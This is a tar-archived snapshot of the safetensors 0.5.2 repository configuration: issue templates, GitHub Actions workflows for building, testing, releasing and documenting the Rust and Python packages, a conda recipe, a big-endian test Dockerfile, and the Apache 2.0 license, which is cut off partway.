pax_global_header00006660000000000000000000000064147375337230014530gustar00rootroot0000000000000052 comment=f05a1ec483c470202a3413772eef8eab6c3a8ba0 safetensors-0.5.2/000077500000000000000000000000001473753372300140705ustar00rootroot00000000000000safetensors-0.5.2/.dockerignore000066400000000000000000000001001473753372300165330ustar00rootroot00000000000000safetensors/target bindings/python/target Dockerfile.s390x.test safetensors-0.5.2/.github/000077500000000000000000000000001473753372300154305ustar00rootroot00000000000000safetensors-0.5.2/.github/ISSUE_TEMPLATE/000077500000000000000000000000001473753372300176135ustar00rootroot00000000000000safetensors-0.5.2/.github/ISSUE_TEMPLATE/bug-report.yml000066400000000000000000000101671473753372300224310ustar00rootroot00000000000000name: "\U0001F41B Bug Report" description: Submit a bug report to help us improve safetensors body: - type: textarea id: system-info attributes: label: System Info description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below. placeholder: safetensors version, platform, python version, ... validations: required: true # - type: textarea # id: who-can-help # attributes: # label: Who can help? # description: | # Your issue will be replied to more quickly if you can figure out the right person to tag with @ # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**. # # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and # a core maintainer will ping the right person. # # Please tag fewer than 3 people. # # Models: # - text models: @ArthurZucker and @younesbelkada # - vision models: @amyeroberts # - speech models: @sanchit-gandhi # - graph models: @clefourrier # # Library: # # - flax: @sanchit-gandhi # - generate: @gante # - pipelines: @Narsil # - tensorflow: @gante and @Rocketknight1 # - tokenizers: @ArthurZucker # - trainer: @sgugger # # Integrations: # # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100 # - ray/raytune: @richardliaw, @amogkam # - Big Model Inference: @sgugger @muellerzr # # Documentation: @sgugger, @stevhliu and @MKhalusova # # Model hub: # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator. # # HF projects: # # - accelerate: [different repo](https://github.com/huggingface/accelerate) # - datasets: [different repo](https://github.com/huggingface/datasets) # - diffusers: [different repo](https://github.com/huggingface/diffusers) # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers) # # Maintained examples (not research project or legacy): # # - Flax: @sanchit-gandhi # - PyTorch: @sgugger # - TensorFlow: @Rocketknight1 # Research projects are not maintained and should be taken as is. # placeholder: "@Username ..." - type: checkboxes id: information-scripts-examples attributes: label: Information description: 'The problem arises when using:' options: - label: "The official example scripts" - label: "My own modified scripts" - type: textarea id: reproduction validations: required: true attributes: label: Reproduction description: | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet. If you have code snippets, error messages, stack traces please provide them here as well. Important! Use code tags to correctly format your code. 
See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code. placeholder: | Steps to reproduce the behavior: 1. 2. 3. - type: textarea id: expected-behavior validations: required: true attributes: label: Expected behavior description: "A clear and concise description of what you would expect to happen." safetensors-0.5.2/.github/ISSUE_TEMPLATE/config.yml000066400000000000000000000000501473753372300215760ustar00rootroot00000000000000blank_issues_enabled: true version: 2.1 safetensors-0.5.2/.github/ISSUE_TEMPLATE/feature-request.yml000066400000000000000000000021121473753372300234530ustar00rootroot00000000000000name: "\U0001F680 Feature request" description: Submit a proposal/request for a new safetensors feature labels: [ "feature" ] body: - type: textarea id: feature-request validations: required: true attributes: label: Feature request description: | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist. - type: textarea id: motivation validations: required: true attributes: label: Motivation description: | Please outline the motivation for the proposal. Is your feature request related to a problem? e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too. - type: textarea id: contribution validations: required: true attributes: label: Your contribution description: | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the CONTRIBUTING.MD [readme](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md) safetensors-0.5.2/.github/PULL_REQUEST_TEMPLATE.md000066400000000000000000000016641473753372300212400ustar00rootroot00000000000000# What does this PR do? Fixes # (issue) or description of the problem this PR solves. safetensors-0.5.2/.github/conda/000077500000000000000000000000001473753372300165145ustar00rootroot00000000000000safetensors-0.5.2/.github/conda/bld.bat000066400000000000000000000000771473753372300177510ustar00rootroot00000000000000cd bindings\python %PYTHON% -m pip install . --prefix=%PREFIX% safetensors-0.5.2/.github/conda/build.sh000066400000000000000000000000751473753372300201510ustar00rootroot00000000000000cd bindings/python $PYTHON -m pip install . --prefix=$PREFIX safetensors-0.5.2/.github/conda/meta.yaml000066400000000000000000000007131473753372300203270ustar00rootroot00000000000000{% set name = "safetensors" %} package: name: "{{ name|lower }}" version: "{{ SAFETENSORS_VERSION }}" source: path: ../../ requirements: host: - pip - python x.x - setuptools - setuptools-rust - maturin run: - python x.x test: imports: - safetensors about: home: https://huggingface.co/docs/safetensors license: Apache License 2.0 license_file: LICENSE summary: "Safe and portable way of storing tensors" safetensors-0.5.2/.github/stale.yml000066400000000000000000000012541473753372300172650ustar00rootroot00000000000000# Number of days of inactivity before an issue becomes stale daysUntilStale: 60 # Number of days of inactivity before a stale issue is closed daysUntilClose: 7 # Issues with these labels will never be considered stale exemptLabels: - pinned - security # Label to use when marking an issue as stale staleLabel: wontfix # Comment to post when marking an issue as stale. 
Set to `false` to disable markComment: > This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions. # Comment to post when closing a stale issue. Set to `false` to disable closeComment: false safetensors-0.5.2/.github/workflows/000077500000000000000000000000001473753372300174655ustar00rootroot00000000000000safetensors-0.5.2/.github/workflows/build_documentation.yml000066400000000000000000000011721473753372300242410ustar00rootroot00000000000000name: Build documentation on: push: branches: - main - doc-builder* - v*-release - use_templates jobs: build: uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main with: commit_sha: ${{ github.sha }} package: safetensors notebook_folder: safetensors_doc package_path: safetensors/bindings/python/ version_tag_suffix: bindings/python/py_src/ install_rust: true custom_container: huggingface/transformers-doc-builder secrets: token: ${{ secrets.HUGGINGFACE_PUSH }} hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} safetensors-0.5.2/.github/workflows/build_pr_documentation.yml000066400000000000000000000013051473753372300247400ustar00rootroot00000000000000name: Build PR Documentation on: pull_request: paths: - "docs/**" - "bindings/python/py_src/**" - ".github/workflows/build_pr_documentation.yml" concurrency: group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }} cancel-in-progress: true jobs: build: uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main with: commit_sha: ${{ github.event.pull_request.head.sha }} pr_number: ${{ github.event.number }} package: safetensors package_path: safetensors/bindings/python/ version_tag_suffix: bindings/python/py_src/ install_rust: true custom_container: huggingface/transformers-doc-builder safetensors-0.5.2/.github/workflows/codecov.yml000066400000000000000000000015441473753372300216360ustar00rootroot00000000000000name: Code coverage on: push: branches: - main jobs: build: runs-on: ubuntu-latest defaults: run: working-directory: ./safetensors steps: - uses: actions/checkout@v3 - name: Install Rust Stable uses: actions-rs/toolchain@v1 with: toolchain: stable components: llvm-tools-preview override: true - uses: Swatinem/rust-cache@v2 - name: Install cargo-llvm-cov for Ubuntu run: cargo install cargo-llvm-cov - name: Coverage report run: cargo llvm-cov --release --lcov --output-path lcov.info - name: Upload to codecov.io uses: codecov/codecov-action@v3 with: token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos working-directory: ./safetensors fail_ci_if_error: true safetensors-0.5.2/.github/workflows/delete_doc_comment.yml000066400000000000000000000004401473753372300240170ustar00rootroot00000000000000name: Delete doc comment on: workflow_run: workflows: ["Delete doc comment trigger"] types: - completed jobs: delete: uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main secrets: comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}safetensors-0.5.2/.github/workflows/delete_doc_comment_trigger.yml000066400000000000000000000003521473753372300255440ustar00rootroot00000000000000name: Delete doc comment trigger on: pull_request: types: [ closed ] jobs: delete: uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main with: pr_number: ${{ github.event.number }}safetensors-0.5.2/.github/workflows/python-bench.yml000066400000000000000000000034311473753372300226070ustar00rootroot00000000000000name: 
Simple benchmarks on: push: branches: - main permissions: # deployments permission to deploy GitHub pages website deployments: write # contents permission to update benchmark contents in gh-pages branch contents: write jobs: benchmark: name: Performance regression check runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable components: rustfmt, clippy - name: Install Python uses: actions/setup-python@v2 with: python-version: "3.10" architecture: "x64" - name: Install working-directory: ./bindings/python run: | pip install -U pip pip install .[dev] - name: Run tests working-directory: ./bindings/python run: | cargo test pytest --benchmark-json output.json benches/ # Download previous benchmark result from cache (if exists) - name: Download previous benchmark data uses: actions/cache@v1 with: path: ./cache key: ${{ runner.os }}-benchmark # Run `github-action-benchmark` action - name: Store benchmark result uses: benchmark-action/github-action-benchmark@v1 with: # What benchmark tool the output.txt came from tool: 'pytest' # Where the output from the benchmark tool is stored output-file-path: ./bindings/python/output.json github-token: ${{ secrets.GITHUB_TOKEN }} # Push and deploy GitHub pages branch automatically auto-push: true comment-on-alert: true # Mention @rhysd in the commit comment alert-comment-cc-users: '@Narsil' safetensors-0.5.2/.github/workflows/python-release-conda.yml000066400000000000000000000075731473753372300242450ustar00rootroot00000000000000name: Python Release - Conda on: push: tags: - v* env: ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }} jobs: build_and_package: runs-on: ${{ matrix.os }} strategy: matrix: os: [windows-latest, macos-latest] # 3.11 not available on Conda yet. 
python: ["3.8", "3.9", "3.10", "3.11"] steps: - name: Checkout repository uses: actions/checkout@v3 - name: Install miniconda uses: conda-incubator/setup-miniconda@v2 with: auto-update-conda: true python-version: ${{ matrix.python }} - name: Conda info shell: bash -l {0} run: conda info - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable - name: Setup conda env shell: bash -l {0} run: | conda install setuptools-rust conda install -c defaults anaconda-client conda-build - name: Extract version shell: bash -l {0} working-directory: ./bindings/python run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV - name: Build conda packages shell: bash -l {0} run: | conda info conda list conda-build .github/conda --python=${{ matrix.python }} - name: Upload to Anaconda shell: bash -l {0} run: | anaconda upload `conda-build .github/conda --output` --force build_and_package_linux: runs-on: ubuntu-latest container: quay.io/pypa/manylinux2014_x86_64 strategy: fail-fast: false matrix: python: [38, 39, 310, 311] include: - python: 38 checksum: e2a4438671e0e42c5bba14cb51de6ce9763938184d6ca2967340bbe972bbe7e6 - python: 39 checksum: 9829d95f639bd0053b2ed06d1204e60644617bf37dd5cc57523732e0e8d64516 - python: 310 checksum: ea5e6e8a3d5a0247b9df85382d27220fac8e59b5778fd313c5913879cd9baafc - python: 311 checksum: 634d76df5e489c44ade4085552b97bebc786d49245ed1a830022b0b406de5817 steps: - name: Checkout repository uses: actions/checkout@v2 - name: Install miniconda run: | yum install -y wget openssl-devel export FILENAME=Miniconda3-py${{ matrix.python }}_23.5.2-0-Linux-x86_64.sh wget https://repo.anaconda.com/miniconda/$FILENAME sha256sum $FILENAME | awk '$1=="${{ matrix.checksum}}"{print"good to go"}' bash $FILENAME -b -p $HOME/miniconda source $HOME/miniconda/bin/activate - name: Show glibc information shell: bash -l {0} run: ldd --version - name: Conda info shell: bash -l {0} run: | source $HOME/miniconda/bin/activate conda info - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable - name: Setup conda env shell: bash -l {0} run: | source $HOME/miniconda/bin/activate conda install setuptools-rust conda install -c defaults anaconda-client conda-build - name: Extract version shell: bash -l {0} working-directory: ./bindings/python run: | source $HOME/miniconda/bin/activate echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV - name: Build conda packages shell: bash -l {0} run: | source $HOME/miniconda/bin/activate conda info conda list conda-build .github/conda --python=${{ matrix.python }} - name: Upload to Anaconda shell: bash -l {0} run: | source $HOME/miniconda/bin/activate anaconda upload `conda-build .github/conda --output` --force safetensors-0.5.2/.github/workflows/python-release.yml000066400000000000000000000116521473753372300231540ustar00rootroot00000000000000# This file is autogenerated by maturin v1.7.4 # To update, run # # maturin generate-ci github -m bindings/python/Cargo.toml # name: CI on: push: branches: - main - master tags: - '*' pull_request: workflow_dispatch: permissions: contents: read jobs: linux: runs-on: ${{ matrix.platform.runner }} strategy: matrix: platform: - runner: ubuntu-latest target: x86_64 - runner: ubuntu-latest target: x86 - runner: ubuntu-latest target: aarch64 - runner: ubuntu-latest target: armv7 - runner: ubuntu-latest target: s390x - runner: ubuntu-latest target: ppc64le steps: - uses: 
actions/checkout@v4 - uses: actions/setup-python@v5 with: python-version: 3.x - name: Build wheels uses: PyO3/maturin-action@v1 with: target: ${{ matrix.platform.target }} args: --release --out dist --manifest-path bindings/python/Cargo.toml sccache: 'true' manylinux: auto - name: Upload wheels uses: actions/upload-artifact@v4 with: name: wheels-linux-${{ matrix.platform.target }} path: dist musllinux: runs-on: ${{ matrix.platform.runner }} strategy: matrix: platform: - runner: ubuntu-latest target: x86_64 - runner: ubuntu-latest target: x86 - runner: ubuntu-latest target: aarch64 - runner: ubuntu-latest target: armv7 steps: - uses: actions/checkout@v4 - uses: actions/setup-python@v5 with: python-version: 3.x - name: Build wheels uses: PyO3/maturin-action@v1 with: target: ${{ matrix.platform.target }} args: --release --out dist --manifest-path bindings/python/Cargo.toml sccache: 'true' manylinux: musllinux_1_2 - name: Upload wheels uses: actions/upload-artifact@v4 with: name: wheels-musllinux-${{ matrix.platform.target }} path: dist windows: runs-on: ${{ matrix.platform.runner }} strategy: matrix: platform: - runner: windows-latest target: x64 - runner: windows-latest target: x86 steps: - uses: actions/checkout@v4 - uses: actions/setup-python@v5 with: python-version: 3.x architecture: ${{ matrix.platform.target }} - name: Build wheels uses: PyO3/maturin-action@v1 with: target: ${{ matrix.platform.target }} args: --release --out dist --manifest-path bindings/python/Cargo.toml sccache: 'true' - name: Upload wheels uses: actions/upload-artifact@v4 with: name: wheels-windows-${{ matrix.platform.target }} path: dist macos: runs-on: ${{ matrix.platform.runner }} strategy: matrix: platform: - runner: macos-13 target: x86_64 - runner: macos-14 target: aarch64 steps: - uses: actions/checkout@v4 - uses: actions/setup-python@v5 with: python-version: 3.x - name: Build wheels uses: PyO3/maturin-action@v1 with: target: ${{ matrix.platform.target }} args: --release --out dist --manifest-path bindings/python/Cargo.toml sccache: 'true' - name: Upload wheels uses: actions/upload-artifact@v4 with: name: wheels-macos-${{ matrix.platform.target }} path: dist sdist: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - name: Build sdist uses: PyO3/maturin-action@v1 with: command: sdist args: --out dist --manifest-path bindings/python/Cargo.toml - name: Upload sdist uses: actions/upload-artifact@v4 with: name: wheels-sdist path: dist release: name: Release runs-on: ubuntu-latest if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }} needs: [linux, musllinux, windows, macos, sdist] permissions: # Use to sign the release artifacts id-token: write # Used to upload release artifacts contents: write # Used to generate artifact attestation attestations: write steps: - uses: actions/download-artifact@v4 - name: Generate artifact attestation uses: actions/attest-build-provenance@v1 with: subject-path: 'wheels-*/*' - name: Publish to PyPI if: "startsWith(github.ref, 'refs/tags/')" uses: PyO3/maturin-action@v1 env: MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST}} with: command: upload args: --non-interactive --skip-existing wheels-*/* safetensors-0.5.2/.github/workflows/python.yml000066400000000000000000000076551473753372300215460ustar00rootroot00000000000000name: Python on: pull_request: jobs: build_and_test: name: Check everything builds & tests runs-on: ${{ matrix.os }} strategy: matrix: os: [ubuntu-latest, macos-13, windows-latest] # Lowest and highest, no version specified 
so that # new releases get automatically tested against version: [{torch: torch==1.10, python: "3.8"}, {torch: torch, python: "3.12"}] # TODO this would include macos ARM target. # however jax has an illegal instruction issue # that exists only in CI (probably difference in instruction support). # include: # - os: macos-latest # version: # torch: torch # python: "3.11" defaults: run: working-directory: ./bindings/python steps: - name: Checkout repository uses: actions/checkout@v3 - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable components: rustfmt, clippy - name: Cargo install audit run: cargo install cargo-audit - uses: Swatinem/rust-cache@v2 with: workspaces: "bindings/python" - name: Install Python uses: actions/setup-python@v5 with: python-version: ${{ matrix.version.python }} architecture: "x64" - name: Lint with RustFmt run: cargo fmt -- --check - name: Lint with Clippy run: cargo clippy --all-targets --all-features -- -D warnings - name: Run Audit run: cargo audit -D warnings - name: Install run: | pip install -U pip pip install .[numpy,tensorflow] pip install ${{ matrix.version.torch }} - name: Install (jax, flax) if: matrix.os != 'windows-latest' run: | pip install .[jax] shell: bash - name: Install (mlx) if: matrix.os == 'macos-latest' run: | pip install .[mlx] shell: bash - name: Check style run: | pip install .[quality] black --check --line-length 119 --target-version py35 py_src/safetensors tests - name: Run tests run: | cargo test pip install .[testing] pytest -sv tests/ test_s390x_big_endian: runs-on: ubuntu-latest permissions: contents: write packages: write name: Test bigendian - S390X steps: - uses: actions/checkout@v2 - name: Set up QEMU uses: docker/setup-qemu-action@v2 - name: Set up Docker Buildx uses: docker/setup-buildx-action@v2 - name: Set short sha id: vars run: echo "GITHUB_SHA_SHORT=$(git rev-parse --short HEAD)" >> $GITHUB_ENV - name: Docker meta id: meta uses: docker/metadata-action@v4 with: # list of Docker images to use as base name for tags images: | ghcr.io/huggingface/safetensors/s390x # generate Docker tags based on the following events/attributes tags: | type=schedule type=ref,event=branch type=ref,event=pr type=semver,pattern={{version}} type=semver,pattern={{major}}.{{minor}} type=semver,pattern={{major}} type=sha - name: Login to Registry uses: docker/login-action@v3 with: registry: ghcr.io username: ${{ github.actor }} password: ${{ secrets.GITHUB_TOKEN }} - name: Test big endian uses: docker/build-push-action@v4 with: platforms: linux/s390x file: Dockerfile.s390x.test tags: ${{ steps.meta.outputs.tags }} labels: ${{ steps.meta.outputs.labels }} cache-from: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max cache-to: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max safetensors-0.5.2/.github/workflows/rust-release.yml000066400000000000000000000013051473753372300226220ustar00rootroot00000000000000name: Rust Release env: CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }} on: push: tags: - v* jobs: rust_publish: runs-on: ubuntu-latest steps: - name: Checkout repository uses: actions/checkout@v3 - name: Install Rust uses: actions-rs/toolchain@v1 with: toolchain: stable - name: Cache Cargo Registry uses: actions/cache@v1 with: path: ~/.cargo/registry key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }} - name: Publish package rust if: ${{ !contains(github.ref, 'rc') }} working-directory: ./safetensors run: cargo publish --token ${CRATES_TOKEN} 
safetensors-0.5.2/.github/workflows/rust.yml000066400000000000000000000031611473753372300212060ustar00rootroot00000000000000name: Rust on: pull_request: jobs: build: runs-on: ${{ matrix.os }} strategy: matrix: os: [ubuntu-latest, windows-latest, macOS-latest] defaults: run: working-directory: ./safetensors steps: - uses: actions/checkout@v3 - name: Install Rust Stable uses: actions-rs/toolchain@v1 with: toolchain: stable components: rustfmt, clippy, llvm-tools-preview override: true - uses: Swatinem/rust-cache@v2 - name: Install cargo-audit run: cargo install cargo-audit - name: Install cargo-llvm-cov for Ubuntu if: matrix.os == 'ubuntu-latest' run: cargo install cargo-llvm-cov - name: Build run: cargo build --all-targets --verbose - name: Lint with Clippy run: cargo clippy --all-targets -- -D warnings - name: Run Tests run: cargo test --verbose - name: Run No-STD Tests run: cargo test --no-default-features --features alloc --verbose - name: Run Audit # RUSTSEC-2021-0145 is criterion so only within benchmarks run: cargo audit -D warnings --ignore RUSTSEC-2021-0145 - name: Coverage report if: matrix.os == 'ubuntu-latest' run: cargo llvm-cov --release --lcov --output-path lcov.info # - name: Upload to codecov.io # if: matrix.os == 'ubuntu-latest' # uses: codecov/codecov-action@v3 # with: # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos # working-directory: ./safetensors # fail_ci_if_error: true safetensors-0.5.2/.github/workflows/stale.yml000066400000000000000000000006261473753372300213240ustar00rootroot00000000000000name: 'Close stale issues and PRs' on: schedule: - cron: '30 1 * * *' jobs: stale: runs-on: ubuntu-latest steps: - uses: actions/stale@v8 with: stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.' 
days-before-stale: 30 days-before-close: 5 safetensors-0.5.2/.github/workflows/trufflehog.yml000066400000000000000000000004001473753372300223470ustar00rootroot00000000000000on: push: name: Secret Leaks jobs: trufflehog: runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v4 with: fetch-depth: 0 - name: Secret Scanning uses: trufflesecurity/trufflehog@main safetensors-0.5.2/.github/workflows/upload_pr_documentation.yml000066400000000000000000000006001473753372300251220ustar00rootroot00000000000000name: Upload PR Documentation on: workflow_run: workflows: ["Build PR Documentation"] types: - completed jobs: build: uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main with: package_name: safetensors secrets: hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}safetensors-0.5.2/.gitignore000066400000000000000000000002011473753372300160510ustar00rootroot00000000000000safetensors/target safetensors/**/Cargo.lock bindings/python/Cargo.lock *.bin *.h5 *.msgpack *.pt *.pdparams *.safetensors *.npz safetensors-0.5.2/.pre-commit-config.yaml000066400000000000000000000027111473753372300203520ustar00rootroot00000000000000repos: - repo: https://github.com/Narsil/pre-commit-rust rev: 0c016cee78144d06d906fccc7715d607a946ca5c hooks: - id: fmt name: "Rust (fmt)" args: ["--manifest-path", "safetensors/Cargo.toml", "--"] - id: clippy name: "Rust (clippy)" args: [ "--manifest-path", "safetensors/Cargo.toml", "--all-features", "--all-targets", "--", "-Dwarnings", ] - repo: https://github.com/Narsil/pre-commit-rust rev: 0c016cee78144d06d906fccc7715d607a946ca5c hooks: - id: fmt name: "Python (fmt)" args: ["--manifest-path", "bindings/python/Cargo.toml", "--"] - id: clippy name: "Python (clippy)" args: [ "--manifest-path", "bindings/python/Cargo.toml", "--all-features", "--all-targets", "--", "-Dwarnings", ] - repo: https://github.com/psf/black rev: 22.3.0 hooks: - id: black name: "Python (black)" args: ["--line-length", "119", "--target-version", "py35"] types: ["python"] - repo: https://github.com/pycqa/flake8 rev: 3.8.3 hooks: - id: flake8 args: ["--config", "bindings/python/setup.cfg"] - repo: https://github.com/pre-commit/mirrors-isort rev: v5.7.0 # Use the revision sha / tag you want to point at hooks: - id: isort safetensors-0.5.2/Dockerfile.s390x.test000066400000000000000000000022501473753372300177240ustar00rootroot00000000000000FROM s390x/python RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \ && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \ && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | bash -s -- -y RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y WORKDIR /safetensors/ RUN /root/miniconda3/bin/pip install -U pip pytest # RUN /root/miniconda3/bin/pip install -U huggingface_hub # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")' COPY . . SHELL ["/bin/bash", "-c"] WORKDIR /safetensors/bindings/python/ RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e . 
RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10' ENTRYPOINT /bin/bash safetensors-0.5.2/LICENSE000066400000000000000000000261351473753372300151040ustar00rootroot00000000000000 Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." 
"Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. 
Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional 